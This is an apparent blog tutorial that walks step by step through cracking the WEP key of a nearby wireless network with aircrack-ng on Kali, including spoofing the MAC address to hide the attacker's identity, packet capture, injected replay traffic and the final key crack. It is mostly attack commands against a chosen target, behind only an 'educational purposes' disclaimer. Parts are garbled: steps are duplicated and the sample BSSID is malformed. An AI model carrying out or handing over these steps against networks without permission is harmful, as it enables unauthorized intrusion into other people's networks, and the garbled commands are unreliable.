Wireless Equivalent Privacy, or WEP as it's commonly referred to, has been around since 1999 and is an older security standard that was used to secure wireless networks. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available,WEP encryption is rarely used. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network! There are many known ways to exploit WEP encryption and we will explore one of those ways in this tutorial. We will use the AirCrack suite to crack a WEP key. The AirCrack suite (or AirCrackNG as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WEP key.
Caution:
This tutorial is intended for educational purposes only.Hacking into others network without permission is illegal.So we are not reponsible for what you are going to do with this.Obey laws.
Requirements
A basic experience with the Kali terminal window is required. A supported wireless card configured for packet injection will also be required. In case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. Please ensure your wireless card allows for packet injection as this is not something that all wireless cards support.
How to do it...
Let's begin the process of using AirCrack to crack a network session secured by WEP.
1. Open a terminal window and bring up a list of wireless network interfaces:
airmon-ng
2. Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at everylocation where wlan0 is mentioned.
3. Next, we need to stop the wlan0 interface and take it down so that we can change our MAC address in the next step.
airmon-ng stop
ifconfig wlan0 down
4. Next, we need to change the MAC address of our interface. Since the MAC address of your machine identifies you on any network, changing the identity of our machine allows us to keep our true MAC address hidden. In this case, we will use 00:11:22:33:44:55.
ifconfig wlan0 down
4. Next, we need to change the MAC address of our interface. Since the MAC address of your machine identifies you on any network, changing the identity of our machine allows us to keep our true MAC address hidden. In this case, we will use 00:11:22:33:44:55.
macchanger --mac 00:11:22:33:44:55 wlan0
5. Now we need to restart airmon-ng.
airmon-ng start wlan0
6. Next, we will use airodump to locate the available wireless networks nearby.
airodump-ng wlan0
7. A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right click your mouse, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10.
8. Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options:
-c allows us to select our channel. In this case, we use 10.
-w allows us to select the name of our file. In this case, we have chosen wirelessattack.
-bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard.
airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0
9. A new terminal window will open displaying the output from the previous command.Leave this window open.
10. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax:
aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface]
aireplay-ng -1 0 -a 09:AC:90:AB:78 –h 00:11:22:33:44:55 –e backtrack wlan0
11. Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format:
11. Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format:
aireplay-ng -3 –b [BSSID] – h [Our chosen MAC address] [Interface]
aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0
aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0
12. Your screen will begin to fill with traffic. Let this process run for a minute or two until
we have information to run the crack.
we have information to run the crack.
13. Finally, we run AirCrack to crack the WEP key.
aircrack-ng –b 09:AC:90:AB:78 wirelessattack.cap
That's it! we used the AirCrack suite to crack the WEP key of a wireless network. AirCrack is one of the most popular programs for cracking WEP. AirCrack works by gathering packets from a wireless connection over WEP and then mathematically analyzing the data to crack the WEP encrypted key. We began by starting AirCrack and selecting our desired interface. Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forced the generated CAP file in order to get the wireless password.
No comments:
Post a Comment